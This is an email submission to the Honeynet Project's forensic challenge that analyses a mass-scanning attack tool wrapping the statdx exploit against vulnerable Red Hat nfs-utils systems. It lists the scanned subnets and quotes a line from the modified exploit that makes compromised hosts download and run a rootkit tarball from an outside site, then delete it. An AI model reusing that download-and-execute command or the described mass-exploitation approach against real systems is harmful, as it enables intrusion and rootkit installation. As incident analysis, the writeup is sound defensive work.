From greg@linuxpower.cx Fri Mar 23 10:13:55 2001 Date: Mon, 19 Mar 2001 12:18:41 -0500 From: Gregory Maxwell To: project@honeynet.org Subject: March Submission 1.What is the blackhat attempting to do with his command line syntax? The attacker is attempting to opportunistically obtain unauthorized access to large groups of systems by probing large blocks of IP space for vulnerable redhat 6.2 systems running nfs-utils-0.1.6-2. The attacker scanned the following subnets: 216.210.0.0/16 200.120.0.0/16 64.120.0.0/16 216.200.0.0/16 200.120.0.0/16 63.1.0.0/16 216.10.0.0/16 210.120.0.0/16 64.1.0.0/16 216.1.0.0/16 194.1.0.0/16 210.128.0.0/16 24.1.0.0/16 12.20.0.0/16 2.What does the tool accomplish? The tool takes a specification of network space as inputs and attempts to attack every address contained within. After attacking the vulnerable system the tool causes the system to download a file called http://www.becys.org/xzibit.tar.gz and execute a contained program called 'install'. Presumably this is a shell-kit of some kind, however the file is no longer available so I can not determine it's exact nature. After it has completed it's dirty deed on a vulnerable system it alerts it's operator via stdout. 3.How does the tool work? A wrapper script and wrapper program iteratively execute an exploit program against a large number of hosts. The stupid way the subnet is specified and the idiotic method the wrapper program iterates the target address shows that while the author might be a 'mA$+3r h4x0r', he/she isn't worth a damn as a programmer. This attack exploits a format string vulnerability in a call to syslog, a very trendy method of attack today. Although this vulnerability was discovered and patched more then 6 months ago there are still a great number of vulnerable systems out there. This attack allows the lucky attacker the ability to execute arbitrary commands on the vulnerable target. The luckstatdx.c programs utilizes this security hole to download and execute what appears to be a root-kit (from both it's name lamerk i.e. Lame root-kit and how it's used). 4.Is this tool a worm, or would you classify it as something else? This tool is not a worm. It is an automated attack tool which allows any incompetent attacker the ability to opportunistically locate and exploit many systems without missing their Saturday-morning cartoons. Because I can not obtain the code executed by this attack (http://www.becys.org/xzibit.tar.gz), I can not determine the exact nature of the attack. It could be possible that the downloaded code is not a root-kit but could instead be a worm, if that is the case then this utility could be considered a worm-jumpstarter although it would still just be an automated attack tool. 5.Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? This tool is an effective, but poorly written, set of wrappers on a slightly modified copy of the statdx.c utility (http://marc.theaimsgroup.com/?l=bugtraq&m=96562828810798&w=2). The statdx utility was only modified so that it would install the attackers choice of software on the attacked system: // Becys was modify herre some cmd. fmax = max(fileno(stdin), sockd) + 1; send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0); // Aici cred ca trebuie un exit. Bonus Question: What information can you obtain about who is using or created the tool? The tool is obtaining it's core exploit code from www.becys.org. It is possible likely that the user of the attack code has a relationship with someone who has sufficient privileges to place files on www.becys.org. The tool itself claims to be authored by 'becys'. It is also possible that the attacker in this case did not have any association with the crackers at www.becys.org but, instead, was too ignorant to modify the program to obtain it's root-kit from their own haven. (They would want to do this because the root-kit at www.becys.org will have a set backdoor of some kind and by checking their access logs anyone with administrative powers at that site would have root access to all the systems the attacker here has compromised.). Gregory Maxwell